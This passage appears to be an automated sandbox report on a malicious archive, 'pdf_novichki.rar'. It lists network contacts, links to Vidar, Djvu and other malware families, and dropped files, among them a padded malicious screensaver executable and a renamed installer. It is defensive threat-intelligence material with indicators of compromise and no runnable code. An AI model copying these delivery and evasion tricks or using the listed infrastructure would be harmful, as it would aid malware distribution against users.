                                      		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                      192.229.221.95
                                      		unknownUnited States
                                      		15133EDGECASTUSfalse
                                      52.109.88.191
                                      		unknownUnited States
                                      		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                      149.154.167.99
                                      		t.meUnited Kingdom
                                      		62041TELEGRAMRUfalse

                                      General Information

                                      Joe Sandbox Version:37.0.0 Beryl
                                      Analysis ID:829691
                                      Start date and time:2023-03-18 21:37:03 +01:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 8m 31s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                      Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
                                      Number of analysed new started processes analysed:17
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:1
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample file name:pdf_novichki.rar
                                      Detection:MAL
                                      Classification:mal80.troj.spyw.evad.winRAR@4/8@1/5
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HDC Information:
                                      • Successful, ratio: 99.3% (good quality ratio 67%)
                                      • Quality average: 53.7%
                                      • Quality standard deviation: 42.9%
                                      HCA Information:
                                      • Successful, ratio: 98%
                                      • Number of executed functions: 20
                                      • Number of non-executed functions: 159

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, rundll32.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, usocoreworker.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.189.173.20
                                      • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, watson.telemetry.microsoft.com
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      21:37:38API Interceptor1x Sleep call for process: OpenWith.exe modified
                                      21:39:19API Interceptor1x Sleep call for process: WerFault.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      116.203.13.130setup.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 116.203.13.130/
                                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 116.203.13.130/edit.zip
                                      tvfratt.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, VidarBrowse
                                      • 116.203.13.130/
                                      installer.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 116.203.13.130/
                                      setup.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 116.203.13.130/
                                      setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                      • 116.203.13.130/edit.zip
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 116.203.13.130/
                                      2.bin.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                      • 116.203.13.130/
                                      cracksetup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 116.203.13.130/edit.zip
                                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 116.203.13.130/edit.zip
                                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 116.203.13.130/edit.zip
                                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 116.203.13.130/
                                      file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 116.203.13.130/
                                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 116.203.13.130/
                                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 116.203.13.130/edit.zip
                                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 116.203.13.130/edit.zip
                                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 116.203.13.130/
                                      setup.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 116.203.13.130/

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      t.mesetup.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 149.154.167.99
                                      tvfratt.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, VidarBrowse
                                      • 149.154.167.99
                                      installer.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                      • 149.154.167.99
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 149.154.167.99
                                      2.bin.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                      • 149.154.167.99
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 149.154.167.99
                                      cracksetup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 149.154.167.99
                                      file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 149.154.167.99
                                      dot_net_crypted.exeGet hashmaliciousVidarBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 149.154.167.99
                                      https://weblive4k.com/the-Highlanders/Get hashmaliciousUnknownBrowse
                                      • 46.105.201.240
                                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 149.154.167.99

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      HETZNER-ASDEsetup.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 116.203.13.130
                                      Launcher.exeGet hashmaliciousRHADAMANTHYS, RedLineBrowse
                                      • 94.130.181.125
                                      0E0BD47371B5E50FC51F147DC456949F8DB70EC27B644.exeGet hashmaliciousRedLineBrowse
                                      • 5.75.147.135
                                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 116.203.13.130
                                      f_00321b.dllGet hashmaliciousEmotetBrowse
                                      • 95.217.221.146
                                      f_00321b.dllGet hashmaliciousEmotetBrowse
                                      • 95.217.221.146
                                      f_00321b.dllGet hashmaliciousEmotetBrowse
                                      • 95.217.221.146
                                      tvfratt.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, VidarBrowse
                                      • 116.203.13.130
                                      installer.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 116.203.13.130
                                      setup.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 116.203.13.130
                                      setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                      • 116.203.13.130
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 116.203.13.130
                                      GXA2jht1bf.exeGet hashmaliciousSystemBCBrowse
                                      • 78.47.64.46
                                      GXA2jht1bf.exeGet hashmaliciousSystemBCBrowse
                                      • 78.47.64.46
                                      Paralysis.x86_64.elfGet hashmaliciousMiraiBrowse
                                      • 78.47.94.122
                                      2.bin.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                      • 116.203.13.130
                                      7rSoC1BfML.exeGet hashmaliciousAmadey, Nymaim, RedLine, SmokeLoader, Stealc, VidarBrowse
                                      • 148.251.234.83
                                      https://knowledgeburrow.com/did-benjamin-franklin-really-say-if-you-fail-to-plan-you-are-planning-to-fail/Get hashmaliciousUnknownBrowse
                                      • 195.201.152.105
                                      https://megacanabisdispensary.com/Get hashmaliciousGRQ ScamBrowse
                                      • 95.216.69.114
                                      Z0ZpvNkW6R.elfGet hashmaliciousMiraiBrowse
                                      • 195.201.97.174
                                      MICROSOFT-CORP-MSN-AS-BLOCKUSnK2Tb6Zm62.elfGet hashmaliciousMiraiBrowse
                                      • 20.199.155.90
                                      IGpJmlvBoU.elfGet hashmaliciousMiraiBrowse
                                      • 40.92.220.254
                                      setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoaderBrowse
                                      • 20.189.173.20
                                      setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoaderBrowse
                                      • 20.189.173.20
                                      MCKPGDXGzR.elfGet hashmaliciousMiraiBrowse
                                      • 72.155.240.182
                                      sora.arm.elfGet hashmaliciousMiraiBrowse
                                      • 65.52.164.129
                                      https://wy3k.adj.st/deeplink_default_appopen?adj_t=om3pxuk_zgvu7py&adj_campaign=branded_app_collateral_socal-la_sp21-5147&adj_adgroup=prov_socal-la_all_email&adj_creative=tickler-all-others&adj_fallback=https%3a%2f%2f22rkb9.codesandbox.io?gq=Y2xlYWh5QGhhcnJpc3dpbGxpYW1zLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                      • 52.109.88.191
                                      JgzCotKhYg.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 157.55.204.16
                                      hMOUwBN0Cs.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 20.232.177.167
                                      31eLibxfJL.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 51.145.168.28
                                      enrWdlZ2wY.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 20.85.193.139
                                      sj6SYjQHo0.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, RHADAMANTHYS, SmokeLoaderBrowse
                                      • 52.182.143.212
                                      2QF0HzvFfv.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoaderBrowse
                                      • 20.42.65.92
                                      http://landgatewagovau.sharepoint.comGet hashmaliciousUnknownBrowse
                                      • 13.107.237.60
                                      hiqPUcOHaw.exeGet hashmaliciousRedLineBrowse
                                      • 52.232.8.179
                                      jew.x86.elfGet hashmaliciousMiraiBrowse
                                      • 40.111.26.222
                                      PDwvmn4KzV.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 157.56.241.233
                                      yAnWn3BP4r.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 157.55.40.141
                                      evzFC7ldP1.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 157.56.241.229
                                      pandora.x86.elfGet hashmaliciousMiraiBrowse
                                      • 13.99.132.13

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      37f463bf4616ecd445d4a1937da06e19setup.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousAmadey, Djvu, SmokeLoaderBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousDjvuBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousDjvuBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousDjvuBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousDjvuBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoaderBrowse
                                      • 149.154.167.99
                                      tvfratt.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, VidarBrowse
                                      • 149.154.167.99
                                      installer.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 149.154.167.99
                                      F49C.exeGet hashmaliciousDjvuBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousDjvuBrowse
                                      • 149.154.167.99
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 149.154.167.99
                                      sj6SYjQHo0.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, RHADAMANTHYS, SmokeLoaderBrowse
                                      • 149.154.167.99
                                      2QF0HzvFfv.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoaderBrowse
                                      • 149.154.167.99
                                      Rechung-R1663322504.exeGet hashmaliciousGuLoaderBrowse
                                      • 149.154.167.99
                                      2.bin.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                      • 149.154.167.99
                                      1.bin.exeGet hashmaliciousBabuk, DjvuBrowse
                                      • 149.154.167.99

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_pdf4ik.scr_d3ed75eaedbf1e5597eeca0ea8836d4192ee030_201b8dc8_79653cc3-7dca-4c64-8ba1-b09584582b02\Report.wer

                                      Download File
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.057425348490445
                                      Encrypted:false
                                      SSDEEP:192:m4Ouj6hLHBUD8hcj6SgKWmW1au7sVr74ItWe:Euj6tBUD82jvA1au7sVX4ItWe
                                      MD5:5A0AF8B3AED364F2C1218082244E440A
                                      SHA1:CA3AE901CA07E693DF8D5BBBE51D7EC2EB03617C
                                      SHA-256:6D6FCB03A0339A25F581F958D543D197184D80F787D978946E254C3C8E5A1940
                                      SHA-512:6E116D83EB41491FEEFCF8C66303DFD1FAEE9CF81E16E18343051FCD12229C9F48BB08A88108F05619F075E4682942F69103146C99D71979A1942A6139AEA07F
                                      Malicious:true
                                      Reputation:low
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.3.6.4.5.5.5.5.8.3.9.4.6.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.3.6.4.5.5.5.8.0.3.9.4.6.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.6.5.3.c.c.3.-.7.d.c.a.-.4.c.6.4.-.8.b.a.1.-.b.0.9.5.8.4.5.8.2.b.0.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.9.9.c.0.a.0.8.-.e.c.8.a.-.4.9.e.f.-.a.8.a.a.-.b.4.0.0.5.7.8.1.9.e.0.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.d.f.4.i.k...s.c.r.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.0.4.-.0.0.0.1.-.0.0.1.5.-.7.3.7.a.-.0.9.a.c.d.9.5.9.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.8.b.9.2.0.e.a.f.8.a.9.2.4.9.d.e.7.9.3.c.e.2.2.4.5.f.2.6.a.8.b.0.0.0.0.e.4.0.4.!.0.0.0.0.6.c.c.e.0.4.8.6.8.4.b.1.a.9.9.2.d.c.d.f.4.4.2.1.7.f.1.f.3.1.1.7.4.7.0.6.4.c.c.0.!.p.d.f.4.i.k...s.c.r.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3.

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER7C94.tmp.dmp

                                      Download File
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 14 streams, Sat Mar 18 20:39:16 2023, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):765694
                                      Entropy (8bit):1.8899497618258603
                                      Encrypted:false
                                      SSDEEP:1536:CXFVBcM9ta3tEhfchQpouc8reQ9R/Z58Dv8UM3X:mEJSq8rwD0
                                      MD5:05DEE22202A8EEFC84C9180C1F016E09
                                      SHA1:41F31BCA899BFB86CB0A88118092D1B3C5FEF776
                                      SHA-256:C94213F511F28805322F157009DB67263C2A5019DD1C70C547A9248D4A01711B
                                      SHA-512:3087625210E28C2613588A25BA4326A4C3B88C3C34FC8A2059AC0B30047D3B68259CD6C177336093AEC31EE67152E7A5DCDF8A85A6FD2794875C5510F16B3C49
                                      Malicious:false
                                      Reputation:low
                                      Preview:MDMP........ .......t!.d.........................................L..........T.......8...........T...........hM...a...........#...........%...................................................................U...........G......t&......GenuineIntelW...........T...........e!.d............................. ..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.8.3.6.2...1...a.m.d.6.4.f.r.e...1.9.h.1._.r.e.l.e.a.s.e...1.9.0.3.1.8.-.1.2.0.2...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER839A.tmp.WERInternalMetadata.xml

                                      Download File
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8354
                                      Entropy (8bit):3.7029609973010493
                                      Encrypted:false
                                      SSDEEP:192:R0l7PW/NiHm6PRhn6Y1RSUr8gmf7tbFph/Ciprz89bFSsfLZXm:R0lcNiG6PRR6YDSUr8gmf7tbjOFRfo
                                      MD5:3192F79A9CDA48FBC8DFFEA17D1480A7
                                      SHA1:806E9B8A5709C31D4930933B07B90E360D4D3F0F
                                      SHA-256:615A6BDC5806289E74E09B04C3E08D7359E1E88986AD7D1B41523579C37918ED
                                      SHA-512:1E0DC45D9BD1294220EDE35719D2A50632E12C4ADCA0111904130516FD43AEE8AAADEA4F4CF0EE63A75C659BFA4F7FCFCBF6B4106EEE6284374DC0C1998587A6
                                      Malicious:false
                                      Reputation:low
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.8.3.6.3.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.8.3.6.2...4.1.8...a.m.d.6.4.f.r.e...1.9.h.1._.r.e.l.e.a.s.e...1.9.0.3.1.8.-.1.2.0.2.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.4.1.8.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.1.6.<./.P.i.

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER83F9.tmp.xml

                                      Download File
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4577
                                      Entropy (8bit):4.4566277652299195
                                      Encrypted:false
                                      SSDEEP:48:cvIwRD8zsqdWh5YI9TjWgc8sqYQbgm8M4JQ4xVlFE+q8ZkV0UXiFsd:uIeft5TSgrsqYzJQCVkRV0UXiFsd
                                      MD5:497292D65168D680F388F9580A462607
                                      SHA1:78D558DB9251ED77569DE2A9B4ABF218DB85CE00
                                      SHA-256:21541AFFE12EBC7FF06A8D724A3F0371DA90A0B8E100D1E3CA484145A7CF9E29
                                      SHA-512:EE33A5DD51EDF09565467CD57BEC9150812CE24DA53D0707DE5A288E17759EE7A531B1BEAAD6B0700FE2E742CAFCF29D94B91DC216CFB2617FD6E9B5531DFDF1
                                      Malicious:false
                                      Reputation:low
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="18363" />.. <arg nm="vercsdbld" val="418" />.. <arg nm="verqfe" val="418" />.. <arg nm="csdbld" val="418" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="950783" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.418.18362.0-11.0.155" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" /

                                      C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_13929_20386-20230318T2137210340-1708.etl

                                      Download File
                                      Process:C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
                                      File Type:data
                                      Category:modified
                                      Size (bytes):4096
                                      Entropy (8bit):4.1093274886622515
                                      Encrypted:false
                                      SSDEEP:24:Yfy7CCuEP4uEcuEepuEORFuEMEuECduEwWuEi8uEP6uEuBuE4bs1ouE8BKuEVaZE:Yfy7C8tbaSxvaDALbyqX
                                      MD5:ABB4C44B2B1018A54F382A05B002BFB8
                                      SHA1:BC3DF6777A93051857CC1649DE6D5059B4764A18
                                      SHA-256:B742A5C1D0229C4967FEAC5081339B6A30C3139821FB5C0ABFA6850BF1E23296
                                      SHA-512:90F5290CFDF548B03FE0D29585671D4B6C79E0415269AF931ED772EB4D6AE8D882A803604F78D10CE7AACF0ACDBE3DED2378A54B50BC659C803F6015AAF78C00
                                      Malicious:false
                                      Reputation:low
                                      Preview:........@........-..Y..(........................... ...80......8.......X...............!.w.Y..#..*...C.L...0T.j..................7F..........................fX...............!.w.Y..#..*...C.L...0T.j...............'..7F.......................@.B:X...............!.w.Y..#..*...C.L...0T.j..................7F.........................$:X...............!.w.Y..#..*...C.L...0T.j..................7F..........................:X...............!.w.Y..#..*...C.L...0T.j................#.7F..........................:X...............!.w.Y..#..*...C.L...0T.j................'.7F..........................:X...............!.w.Y..#..*...C.L...0T.j................+.7F..........................:X...............!.w.Y..#..*...C.L...0T.j................/.7F..........................:X...............!.w.Y..#..*...C.L...0T.j................2.7F........................./:X...............!.w.Y..#..*...C.L...0T.j...............E5.7F..........................:X...............!.w.Y..#..*...C.L...0T.j.......

                                      C:\Users\user\Desktop\pdf_novichki\pdf\ne trogaite.txt

                                      Download File
                                      Process:C:\Program Files\7-Zip\7zG.exe
                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: PuTTY release 0.78 installer, Author: Simon Tatham, Keywords: Installer, Comments: This installer database contains the logic and data required to install PuTTY release 0.78 (64-bit)., Template: x64;1033, Revision Number: {F5BABDF1-815A-4F73-82E1-B79790A1551E}, Create Time/Date: Fri Oct 28 19:24:49 2022, Last Saved Time/Date: Fri Oct 28 19:24:49 2022, Number of Pages: 200, Number of Words: 2, Number of Characters: 0, Name of Creating Application: Windows Installer XML Toolset (), Security: 2
                                      Category:dropped
                                      Size (bytes):3705856
                                      Entropy (8bit):7.837448100594935
                                      Encrypted:false
                                      SSDEEP:98304:Ujhyh9EoxGHgBRn8Tg4IDrwRW8FMDMb34+NHC6:UjhyJPR8Tg4IDrwdFMD048
                                      MD5:108B432C4DC0A66B657D985E180BEC71
                                      SHA1:262812D43303B7DDC7C04A1C243172EBE6579F00
                                      SHA-256:E64775374097F1B1C8FD4173F7D5BE4305B88CEC26A56D003113AFF2837AE08E
                                      SHA-512:5DDB97078B417F22C54DCE768564DEC58FD92A9C190F7A6CAC9C7979A0F136DD439DA1D59DD3C088E709433F5C4F79C033ABD4B6CA8989D38620C20F4623386E
                                      Malicious:false
                                      Reputation:low
                                      Preview:......................>...................9............................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...................................................................................................................................................................................................................MSCF.....,......,...................F........k........\Uz...HelpFile_File......k....\U....LICENCE_File..%...q....\U...Pageant_File.0........\U...Plink_File...........\U...PSCP_File. Y....+...\U...PSFTP_File.(...$.;...\U...PuTTY_File..Y..L.N...\U....PuTTYgen_File.%...d"X...\Uy...README_File.h....(X...\Uz...Website_File...S8....CK.}gTTI.n.s.A$....s&.J.(&l........"...$.P..F.....q..1..1...C.9}....u..A.B.z..kW.]............Q...'.dhi....V7..hT.Kh8....g..$K.;.....9.......T5.

                                      C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr

                                      Download File
                                      Process:C:\Program Files\7-Zip\7zG.exe
                                      File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                      Category:dropped
                                      Size (bytes):1153453336
                                      Entropy (8bit):0.09316002155911432
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:B082DDE06D83A96B2B35A49387E3C12A
                                      SHA1:95332FDE148D4E6A5E7160126CC8EEB2644CA54A
                                      SHA-256:64A764DE52A8BCDDD5A3CFEA7B9A474FB239E8B7CB9B4CBF839C9F9FBCDD4251
                                      SHA-512:31C5A66EAC51DA5A04A491DAED970128AF9282074FD129E9CDC8F1A176DC1D7EC75DF818BE5315D440C2D2817286EFEC2981777AED034EAABC87594577341DEF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...U..d............... ..t..:z...............u...@...........................z......Xz......................................Pu.......u................D.M...................................pu.....................hQu..............................text.....t.......t.................`.P`.data.........u.......t.............@.0..rdata....... u.......t.............@.`@.eh_fram.....0u.......u.............@.0@.bss.........@u.......................0..idata.......Pu.......u.............@.0..CRT.........`u......"u.............@.0..tls.... ....pu......$u.............@.0..rsrc.........u......&u.............@.0.........................................................................................................................................................................................................................................................................

                                      C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst

                                      Download File
                                      Process:C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):5139
                                      Entropy (8bit):1.9174231909950206
                                      Encrypted:false
                                      SSDEEP:24:BMO1ZhMqxHJ9tIby5rAh9EIQ3+fqNOAqMO8RepKpgDdzzRq+cb:BnZhMqHQmOiNOlDplDdzzg
                                      MD5:F91C09B033C3EE378C512B81EE4093B2
                                      SHA1:C33A8A271C37519BC2F713329AEBE906894E171F
                                      SHA-256:419E853D5FFEE0E356B4F615C0F33AEE66C1ECC871742676AB01C66127A9D724
                                      SHA-512:AA304ED85514E38EB144EECAEF0F5E640EACCD6646D0FD04288604D3C8CCE9D7E6C1CD7B157A182F3908D1ADBD7C430EF997855F00FC416EC343BAEF6010B02C
                                      Malicious:false
